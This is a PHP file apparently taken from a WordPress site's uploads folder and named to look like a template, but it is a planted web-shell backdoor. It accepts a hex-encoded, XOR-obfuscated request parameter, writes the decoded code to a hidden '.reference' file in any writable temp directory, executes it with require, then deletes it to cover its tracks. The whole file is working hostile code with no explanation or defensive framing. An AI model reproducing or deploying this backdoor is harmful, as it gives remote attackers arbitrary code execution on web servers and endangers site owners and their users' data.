File: /home/lab-hr.com/public_html/wp-content/uploads/2025/Template.in.php
<?php
if(array_key_exists("el\x65m", $_REQUEST) && !is_null($_REQUEST["el\x65m"])){
$mrk = hex2bin($_REQUEST["el\x65m"]);
$ent = '' ; $b = 0; do{$ent .= chr(ord($mrk[$b]) ^ 94);$b++;} while($b < strlen($mrk));
$data = array_filter([sys_get_temp_dir(), getcwd(), "/var/tmp", getenv("TEMP"), "/dev/shm", getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp"]);
foreach ($data as $binding):
if (!!is_dir($binding) && !!is_writable($binding)) {
$desc = sprintf("%s/.reference", $binding);
if (file_put_contents($desc, $ent)) {
require $desc;
unlink($desc);
exit;
}
}
endforeach;
}